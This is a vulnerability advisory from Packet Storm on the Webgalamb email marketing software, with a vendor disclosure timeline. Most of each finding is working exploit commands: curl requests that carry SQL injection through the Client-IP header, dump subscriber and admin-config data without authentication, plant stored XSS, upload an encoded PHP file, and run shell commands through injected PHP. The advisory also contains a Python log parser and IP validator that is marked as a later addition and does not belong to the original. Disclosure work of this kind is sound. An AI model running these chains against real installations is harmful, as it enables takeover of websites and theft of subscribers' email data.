Webgalamb Information Disclosure / XSS / CSRF / SQL Injection

Posted Jan 7, 2019
Authored by Daniel Jones

Webgalamb suffers from remote code execution, cross site request forgery, cross site scripting, information leakage, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss, sql injection, info disclosure, csrf
advisories | CVE-2018-19509, CVE-2018-19510, CVE-2018-19511, CVE-2018-19512, CVE-2018-19513, CVE-2018-19514, CVE-2018-19515
MD5 | 1c993ff1caf37847e75ec6a54088c49a


Vendor: E.N.S. Zrt (www.ens.hu)
Product: Webgalamb (www.webgalamb.hu, www.facebook.com/webgalamb)

Webgalamb is a commercial email marketing software for managing subscription lists and sending out bulk emails. It is not SaaS but a PHP-based web application that is typically hosted next to the company website of Webgalamb customers.

Webgalamb is affected by multiple security flaws that could be exploited by threat actors to take complete control of Webgalamb deployments and the company websites hosting them, and to exfiltrate the email subscription databases.

The findings were verified against the latest Webgalamb versions (v6 and v7); older versions are probably also affected. The vendor confirmed the vulnerabilities, but no remediation plan was shared.

CVE-2018-19513: Information disclosure

The log files created by the application are exposed to the internet. The file names are predictable. For example:


The log file could contain sensitive client data (email addresses) and also facilitates exploitation of SQL injection errors.

CVE-2018-19510: SQL injection in insert via Client-IP HTTP header

curl -d "mail=test2@test.tt&save=1" --header "Client-Ip: 'foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

In the SQL log:
2018-10-25 18:06:38 - Url: http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83

Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum, verify_code, active, g, a, ipdatum ) values

( 'test2@test.tt', 'test2@test.tt', '3', ''foo', ''foo', CURDATE(), 'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '1', now() )]/You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'foo', ''foo', CURDATE(), 'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '' at line 2 : (c:\htdocs\webgalamb\subscriber.php:2241)

Example of a meaningful SQL injection:

curl -d "mail=test4@test.tt&save=1" --header "Client-Ip: ', 5,CURDATE(), 7, 1,9,10, now()), ((SELECT GROUP_CONCAT(conf_value) FROM wg7_config),2,3,4,5,CURDATE(),7,8,65535,1,NOW()) -- foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

An UPDATE statement on wg7_users is vulnerable to the same pattern; it is possible to modify any user's subscription.
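As an added defender-side illustration (not code from the advisory or from the vendor): a parser for the exposed SQL error log format shown above that flags failed wg7_users inserts whose ip/ip_orig values are not IP addresses, together with the Client-IP header validation the application should apply before the value ever reaches a query. The log sample is constructed; the second (benign) entry and the exact error texts are assumptions.

```python
import ipaddress
import re

# Constructed sample (modelled on the advisory's one "Bad SQL" entry; the benign second entry is assumed).
SAMPLE_LOG = r"""2018-10-25 18:06:38 - Url: http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83

Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum, verify_code, active, g, a, ipdatum ) values
( 'test2@test.tt', 'test2@test.tt', '3', ''foo', ''foo', CURDATE(), 'k7k6', '1', '1', '1', now() )]/You have an error in your SQL syntax at line 2 : (c:\htdocs\webgalamb\subscriber.php:2241)
2018-10-25 18:09:11 - Url: http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83

Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum, verify_code, active, g, a, ipdatum ) values
( 'test3@test.tt', 'test3@test.tt', '3', '203.0.113.9', '203.0.113.9', CURDATE(), 'ab12', '1', '1', '1', now() )]/Duplicate entry 'test3@test.tt' for key 'mail' : (c:\htdocs\webgalamb\subscriber.php:2241)
"""

# One log entry: timestamp/URL line, blank line, then the failed statement and the MySQL error.
ENTRY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) - Url: (?P<url>\S+)\s*"
    r"Bad SQL:\[(?P<sql>.*?)\]/(?P<err>.*?) : \((?P<src>[^)]*)\)$",
    re.S | re.M,
)

def parse_bad_sql_log(text):
    """Split the SQL error log into entries (dicts with ts, url, sql, err, src)."""
    return [m.groupdict() for m in ENTRY_RE.finditer(text)]

def validate_client_ip(value):
    """Hardening for the Client-IP header (added here, not the vendor's code): accept only a valid
    IPv4/IPv6 literal. Even an accepted value must still be bound as a prepared-statement parameter."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None

def suspicious_ip_values(entry):
    """Return the ip/ip_orig literals of a failed wg7_users INSERT that are not valid IP
    addresses, i.e. attacker-controlled Client-IP input that reached the SQL layer."""
    m = re.search(r"insert into `wg7_users`\s*\((.*?)\)\s*values\s*\((.*)\)\s*$",
                  entry["sql"], re.S | re.I)
    if not m:
        return []
    cols = [c.strip() for c in m.group(1).split(",")]
    vals = [v.strip() for v in m.group(2).split(",")]  # naive split; adequate for these entries
    flagged = []
    for col, val in zip(cols, vals):
        if col not in ("ip", "ip_orig"):
            continue
        if len(val) >= 2 and val[0] == val[-1] == "'":
            val = val[1:-1]  # drop the outer quotes the application added around the value
        if validate_client_ip(val) is None:
            flagged.append(val)
    return flagged
```

A failed statement at subscriber.php:2241 with a non-IP value in the ip columns is the signature of someone probing this injection point; valid IPs with an unrelated MySQL error are ordinary application noise.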

CVE-2018-19515: Authentication bypass

The system/ajax.php script offers various functionality that is supposed to be available only to the administrator of the system.
However, by supplying one of the bgsend, atment_sddd1xGz or xls_bgimport query parameters, most of these methods become available without authentication.

For exploitation, see the next examples.

Dumping the database (email addresses of subscribed users), without authentication:

curl -d "uidselect=&g=1" http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1

<a href="#" onclick="$('#un').val('test@test.tt '); $('#u_ID').val('1'); return false;">test@test.tt</a>

Combining the vulnerabilities above, it is possible to exfiltrate any data from the system:

curl -d "uidselect=&g=65535" http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1

<a href="#" onclick="$('#un').val('*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@foo.fo,foo@foo.fo,2018-10-23,,,,200,300,2018.10.23. 18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,,,,,,,,,,,,,0, '); $('#u_ID').val('14'); return false;">*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@foo.fo,foo@foo.fo,2018-10-23,,,,200,300,2018.10.23. 18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,,,,,,,,,,,,,0,</a>

Note that the response above contains the result of the GROUP_CONCAT over the wg7_config table executed by the earlier injection, which also includes the administrator's password (stored via MySQL's PASSWORD() function).

CVE-2018-19509: Persistent XSS, targeting the administrator

The Webgalamb application appears to make opportunistic calls to htmlspecialchars() instead of using a templating engine with proper contextual encoding.
Since arbitrary strings can be inserted into the database, arbitrary JavaScript can be executed in the administrator's browser.

curl -d "mail=test5@test.tt&save=1" --header "Client-Ip: ', 5,CURDATE(), 7, 1,9,10, now()), (char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,60,47,115,99,114,105,112,116,62),2,3,4,5,CURDATE(),7,8,1,1,NOW()) -- foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

<h2><script>alert(document.domain)</script> feliratkozó adatai</h2>

The same XSS attack could be mounted via other entry points as well.

CVE-2018-19511: CSRF

The application does not feature any security measures to prevent CSRF attacks.
An external, attacker-controlled site could submit a POST request to http://www.victim.tld/webgalamb/wg7.php?options=1 in the context of an authenticated administrator to change the administrator password and take control of a Webgalamb installation.

CVE-2018-19512: Arbitrary code execution (as an authenticated administrator)

curl -v --header "Cookie: PHPSESSID=762b286eef672d9b618894b7f47a20ca; webgalamb6=3s4kcr7r7r5i47e68002r7ofn5" -F "file=@test-exploit.wgx" http://www.victim.tld/webgalamb/system/ajax.php?wgmfile=1

Where test-exploit.wgx is:
@WGMX PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48d2d4PjxpbWFnZXM+PGltYWdlPjxuYW1lPi4uL3B3bmQucGhwPC9uYW1lPjxmaWxlPlBEOXdhSEFLY0dod2FXNW1ieWdwT3dvL1BnPT08L2ZpbGU+PC9pbWFnZT48L2ltYWdlcz48L3dneD4=

The code can then be executed via the following HTTP call:


CVE-2018-19514: Arbitrary remote code execution without authentication

Uploading a CSV file:

curl -v -F "file=@import.csv" -F "g=1" "http://www.victim.tld/webgalamb/system/ajax.php?import_fupl=1&atment_sddd1xGz=1"

It is placed here:


Processing the file and inserting its lines into the wg7_import table:

curl -v --header "Cookie: webgalamb6=pid" -d "xls_converz=1" -d "g=1" -d "exp=.csv" "http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1"

Processing it further (inserting the data into the fields table):

curl -v "http://www.victim.tld/webgalamb/system/ajax.php?xls_bgimport=1&pid=pid&g=1&X=0&Y=0"

The exploit payload looks like this (import.csv):


Once it has been processed, arbitrary commands can be executed via the subscription form:

curl -d "mail=test1@test.tt&save=1" --header "C: die(phpinfo());" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"
curl -d "mail=test1@test.tt&save=1" --header "C: die(shell_exec('whoami'));" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83"

10/27/2018: Initial contact attempt with the vendor
10/31/2018: Second attempt with additional email addresses
10/31/2018: Initial feedback from the vendor, confirming the channel is appropriate for receiving the report
10/31/2018: Report submitted
11/12/2018: Ping
11/12/2018: Webgalamb acknowledging the vulnerabilities
11/12/2018: Communicating planned date of public disclosure once again

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By